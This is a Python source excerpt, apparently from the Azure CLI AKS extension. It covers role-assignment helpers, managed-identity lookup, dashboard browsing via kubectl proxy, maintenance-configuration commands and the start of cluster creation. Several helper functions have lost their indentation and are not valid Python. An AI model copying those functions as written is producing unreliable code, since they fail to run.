# defined earlier in this file; this later definition is the one in effect
# after import. Consider removing one copy.
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete role assignments for *service_principal*, retrying on CloudError.

    Retries up to 10 times with linearly growing sleeps; CLIError is
    re-raised immediately. Returns True on success, False when all
    attempts failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError as ex:
            raise ex
        except CloudError as ex:
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # loop exhausted without a break -> deletion never succeeded
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments, then filter client-side by scope, role and assignee.

    Scope (when given) wins over the assignee filter for the server-side
    query; the remaining criteria are applied to the returned list.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            # transitive query: assignments granted via group membership too
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # keep assignments at the requested scope (and, optionally, inherited ones)
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, service principal name, or object id) to an AAD object id.

    Tries, in order: user principal name (when it contains '@'), service
    principal name, then a direct object-id lookup. Raises CLIError when
    nothing matches.
    """
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if assignee.find('@') >= 0:  # looks like a user principal name
        result = list(client.users.list(
            filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])
    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError(
            "No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Fetch directory-object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True,
                                 object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a Network Contributor assignment already exists at *scope*."""
    # well-known role-definition GUID for 'Network Contributor'
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    return any(
        a.scope == scope and a.role_definition_id.endswith(network_contributor_role_id)
        for a in assignments_client.list_for_scope(scope=scope, filter='atScope()'))
# Matches a user-assigned identity ARM resource id, capturing
# (1) subscription id, (2) resource group, (3) identity name; case-insensitive.
_re_user_assigned_identity_resource_id = re.compile(
    r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
    flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Fetch a user-assigned managed identity from its ARM *resource_id*.

    Raises CLIError when the id cannot be parsed or the identity does not
    exist.
    """
    # ARM ids are case-insensitive; normalize before matching
    resource_id = resource_id.lower()
    match = _re_user_assigned_identity_resource_id.search(resource_id)
    if match:
        subscription_id = match.group(1)
        resource_group_name = match.group(2)
        identity_name = match.group(3)
        msi_client = get_msi_client(cli_ctx, subscription_id)
        try:
            identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                               resource_name=identity_name)
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError("Identity {} not found.".format(resource_id))
            raise CLIError(ex.message)
        return identity
    raise CLIError(
        "Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Client id of the user-assigned identity addressed by *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
    """Principal (object) id of the user-assigned identity addressed by *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd,  # pylint: disable=too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               disable_browser=False,
               listen_address='127.0.0.1',
               listen_port='8001'):
    """Open the cluster's Kubernetes resources view.

    For clusters on k8s >= 1.19.0 or without the kube-dashboard addon, opens
    the Azure Portal workloads view. Otherwise fetches credentials, locates
    the dashboard pod/port via kubectl, and tunnels to it with
    'kubectl proxy' (with Cloud Shell-specific port plumbing).
    """
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            # Azure Portal URL (https://portal.azure.com for public cloud)
            cmd.cli_ctx.cloud.endpoints.portal +
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning(
                'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    # temporary kubeconfig used by every kubectl invocation below
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post(
            'http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning(
            'To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address'):
                # fall back for older kubectl without --address support
                if listen_address != '127.0.0.1':
                    logger.warning(
                        '"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning(
                        'The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig",
                                 browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to the monitoring identity.

    Prefers the cluster's service principal when one exists; otherwise uses
    the omsagent addon's MSI object id. Only warns (does not raise) when the
    role assignment cannot be created or no identity is found.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
            (hasattr(
                result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # Fix: the two implicitly-concatenated literals rendered as
        # "for roleassignment" (missing space between 'role' and 'assignment')
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the AGIC addon identity the roles it needs on gateway/subnet/vnet.

    Uses the cluster's service principal when present, else the ingress
    addon's MSI. Depending on the addon config, assigns Contributor on the
    application gateway's resource group, Network Contributor on the
    configured subnet, and Contributor on the nodepool vnet (when a subnet
    CIDR will be used). Failures only warn.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
            (hasattr(
                result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[
            CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            # existing gateway: Contributor on its whole resource group
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            # dedicated subnet: Network Contributor on that subnet
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            # subnet CIDR: Contributor on the vnet the agent pool lives in
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(
                    result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal, scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(cmd, client, resource_group_name, cluster_name):
    """List all maintenance configurations of the given managed cluster."""
    return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(cmd, client, resource_group_name, cluster_name, config_name):
    """Show one maintenance configuration of a managed cluster."""
    logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
                   resource_group_name, cluster_name, config_name)
    return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(cmd, client, resource_group_name, cluster_name, config_name):
    """Delete the named maintenance configuration from a managed cluster."""
    logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
                   resource_group_name, cluster_name, config_name)
    return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
    cmd,
    client,
    resource_group_name,
    cluster_name,
    config_name,
    config_file,
    weekday,
    start_hour
):
    """Create a new maintenance configuration on a managed cluster.

    Raises CLIError when a configuration with the same name already exists.
    """
    configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
    # fail fast instead of silently overwriting an existing configuration
    if any(config.name == config_name for config in configs):
        # Fix: corrected user-facing typo 'maitenance' -> 'maintenance'
        raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
                       "use 'aks maintenanceconfiguration list' to get current list of maintenance "
                       "configurations".format(config_name))
    return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name,
                                                        config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
    cmd,
    client,
    resource_group_name,
    cluster_name,
    config_name,
    config_file,
    weekday,
    start_hour
):
    """Update an existing maintenance configuration on a managed cluster.

    Raises CLIError when no configuration with the given name exists (update
    must not implicitly create one); otherwise delegates to the shared
    create/update helper.
    """
    configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
    # Guard: update requires the named configuration to already exist.
    if not any(config.name == config_name for config in configs):
        # NOTE: fixed user-facing message — added the missing space after the
        # period (previously rendered "exist.use") and fixed the "maitenance" typo.
        raise CLIError("Maintenance configuration '{}' doesn't exist. "
                       "Use 'aks maintenanceconfiguration list' to get current list of maintenance configurations".format(config_name))
    return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd,   # pylint: disable=too-many-locals,too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               ssh_key_value,
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               enable_vmss=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               os_sku=None,
               enable_fips_image=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               enable_msi_auth_for_monitoring=False,
               min_count=None,
               max_count=None,
               vnet_subnet_id=None,
               pod_subnet_id=None,
               ppg=None,
               max_pods=0,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               node_zones=None,
               enable_node_public_ip=False,
               node_public_ip_prefix_id=None,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               enable_pod_security_policy=False,
               node_resource_group=None,
               uptime_sla=False,
               attach_acr=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               enable_managed_identity=True,
               fqdn_subdomain=None,
               disable_public_fqdn=False,
               api_server_authorized_ip_ranges=None,
               aks_custom_headers=None,
               appgw_name=None,
               appgw_subnet_prefix=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_aad=False,
               enable_azure_rbac=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               enable_sgxquotehelper=False,
               kubelet_config=None,
               linux_os_config=None,
               http_proxy_config=None,
               assign_identity=None,
               auto_upgrade_channel=None,
               enable_pod_identity=False,
               enable_pod_identity_with_kubenet=False,
               enable_encryption_at_host=False,
               enable_ultra_ssd=False,
               enable_secret_rotation=False,
               disable_local_accounts=False,
               no_wait=False,
               assign_kubelet_identity=None,
               yes=False):
    """Create a new AKS managed cluster.

    Validates and cross-checks the (many) mutually-dependent options, builds a
    ManagedCluster model out of the individual profile objects (agent pool,
    linux/windows, service principal, network, add-ons, AAD, identity, ...),
    and finally submits it via _put_managed_cluster_ensuring_permission,
    retrying on service-principal replication latency.

    Returns the created-cluster result from the PUT helper, or None when the
    user declines the system-assigned-identity confirmation prompt.
    Raises CLIError / ArgumentUsageError / ResourceNotFoundError on invalid
    option combinations.
    """
    # --- SSH key validation: required unless --no-ssh-key was given. ---
    if not no_ssh_key:
        try:
            if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
                raise ValueError()
        except (TypeError, ValueError):
            shortened_key = truncate_text(ssh_key_value)
            raise CLIError(
                'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    # --- DNS prefix / FQDN subdomain: mutually exclusive; derive a default
    # prefix when neither is supplied. ---
    if dns_name_prefix and fqdn_subdomain:
        raise CLIError(
            '--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
    if not dns_name_prefix and not fqdn_subdomain:
        dns_name_prefix = _get_default_dns_prefix(
            name, resource_group_name, subscription_id)
    # Default the cluster location to the resource group's location.
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # Flag to be removed, kept for back-compatibility only. Remove the below section
    # when we deprecate the enable-vmss flag
    if enable_vmss:
        if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
            raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
                           format(vm_set_type))
        vm_set_type = "VirtualMachineScaleSets"
    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(
        load_balancer_sku, kubernetes_version)
    # Authorized IP ranges require the standard load balancer SKU.
    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError(
            '--api-server-authorized-ip-ranges can only be used with standard load balancer')
    # --- System agent pool profile for the initial node pool. ---
    agent_pool_profile = ManagedClusterAgentPoolProfile(
        # Must be 12 chars or less before ACS RP adds to it
        name=_trim_nodepoolname(nodepool_name),
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        os_sku=os_sku,
        mode="System",
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        enable_fips=enable_fips_image,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        # max_pods=0 (the default) means "unset": let the service decide.
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool_profile.os_disk_type = node_osdisk_type
    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
    if kubelet_config:
        agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
    if linux_os_config:
        agent_pool_profile.linux_os_config = _get_linux_os_config(
            linux_os_config)
    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(
            admin_username=admin_username, ssh=ssh_config)
    # --- Windows profile: only when a Windows admin username is given;
    # prompt for the password interactively when it was omitted. ---
    windows_profile = None
    if windows_admin_username:
        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(
                    msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError(
                    'Please specify both username and password in non-interactive mode.')
        windows_license_type = None
        if enable_ahub:
            windows_license_type = 'Windows_Server'
        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)
    service_principal_profile = None
    principal_obj = None
    # If customer explicitly provides a service principal, disable managed identity.
    if service_principal and client_secret:
        enable_managed_identity = False
    if not enable_managed_identity:
        principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                      service_principal=service_principal, client_secret=client_secret,
                                                      subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
                                                      fqdn_subdomain=fqdn_subdomain, location=location, name=name)
        service_principal_profile = ManagedClusterServicePrincipalProfile(
            client_id=principal_obj.get("service_principal"),
            secret=principal_obj.get("client_secret"))
    # --- ACR attach: with managed identity the role assignment happens after
    # creation (so --no-wait is disallowed); with SPN it can be done up front. ---
    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)
    # --- Custom VNet subnet: grant Network Contributor on the subnet unless
    # skipped or a matching role assignment already exists. ---
    need_post_creation_vnet_permission_granting = False
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # if service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. Two cases:
        # 1. For system assigned identity, we just tell user to grant the
        # permission after the cluster is created to keep consistent with portal experience.
        # 2. For user assigned identity, we can grant needed permission to
        # user provided user assigned identity before creating managed cluster.
        if service_principal_profile is None and not assign_identity:
            msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own'
                   'subnet, which will have no latency for the role assignment to '
                   'take effect. When using SYSTEM assigned identity, '
                   'azure-cli will grant Network Contributor role to the '
                   'system assigned identity after the cluster is created, and '
                   'the role assignment will take some time to take effect, see '
                   'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
                   'proceed to create cluster with system assigned identity?')
            from knack.prompting import prompt_y_n
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            need_post_creation_vnet_permission_granting = True
        else:
            scope = vnet_subnet_id
            identity_client_id = ""
            if assign_identity:
                identity_client_id = _get_user_assigned_identity_client_id(
                    cmd.cli_ctx, assign_identity)
            else:
                identity_client_id = service_principal_profile.client_id
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        identity_client_id, scope=scope):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
    # --- Network profile: explicit when any networking option is set,
    # otherwise a default based on the load balancer SKU. ---
    load_balancer_profile = create_load_balancer_profile(
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)
    outbound_type = _set_outbound_type(
        outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
    network_profile = None
    if any([network_plugin,
            pod_cidr,
            service_cidr,
            dns_service_ip,
            docker_bridge_address,
            network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError(
                'Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )
    # --- Add-on profiles (monitoring, app-gateway ingress, virtual node, ...). ---
    addon_profiles = _handle_addons_args(
        cmd=cmd,
        addons_str=enable_addons,
        subscription_id=subscription_id,
        resource_group_name=resource_group_name,
        addon_profiles={},
        workspace_resource_id=workspace_resource_id,
        enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
        appgw_name=appgw_name,
        appgw_subnet_prefix=appgw_subnet_prefix,
        appgw_subnet_cidr=appgw_subnet_cidr,
        appgw_id=appgw_id,
        appgw_subnet_id=appgw_subnet_id,
        appgw_watch_namespace=appgw_watch_namespace,
        enable_sgxquotehelper=enable_sgxquotehelper,
        aci_subnet_name=aci_subnet_name,
        vnet_subnet_id=vnet_subnet_id,
        enable_secret_rotation=enable_secret_rotation,
    )
    monitoring = False
    if CONST_MONITORING_ADDON_NAME in addon_profiles:
        monitoring = True
        if enable_msi_auth_for_monitoring and not enable_managed_identity:
            raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
        # Create the workspace / data-collection rule before the cluster;
        # the DCR *association* (create_dcra) is deferred until after creation.
        _ensure_container_insights_for_monitoring(cmd,
                                                  addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id,
                                                  resource_group_name, name, location,
                                                  aad_route=enable_msi_auth_for_monitoring, create_dcr=True,
                                                  create_dcra=False)
    # addon is in the list and is enabled
